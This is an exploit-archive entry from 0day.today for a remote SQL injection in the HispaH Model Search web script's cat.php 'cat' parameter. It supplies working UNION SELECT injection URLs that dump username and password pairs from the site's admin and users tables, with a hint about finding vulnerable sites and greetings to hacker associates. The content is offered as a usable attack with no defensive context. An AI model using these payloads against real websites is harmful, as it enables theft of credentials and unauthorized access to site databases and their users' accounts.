HispaH Model Search (cat.php cat) Remote SQL Injection Vulnerability

2008-05-09T00:00:00
ID 1337DAY-ID-2981
Type zdt
Reporter 0day Today Team
Modified 2008-05-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
HispaH Model Search (cat.php cat) Remote SQL Injection Vulnerability
====================================================================




############### >>> Remote SQL Injection <<<  ###############



## script : model-search
## download : www.hispah.com/demos/models1rock  ::> demo

## dork    : find it
## exploit : http://www.site.me/cat.php?cat=[sql injection]

## example:here u can found an sql exploit :::
## for admin inf0 :::
 www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+admin/*
## for users inf0  :::
 www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+users/*


########### Greetz #############


>>>my best freinds ::  titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker $ anaconda-ksa $ sirus $ crazy -x  and all freinds
>>> all muslims



#  0day.today [2018-02-19]  #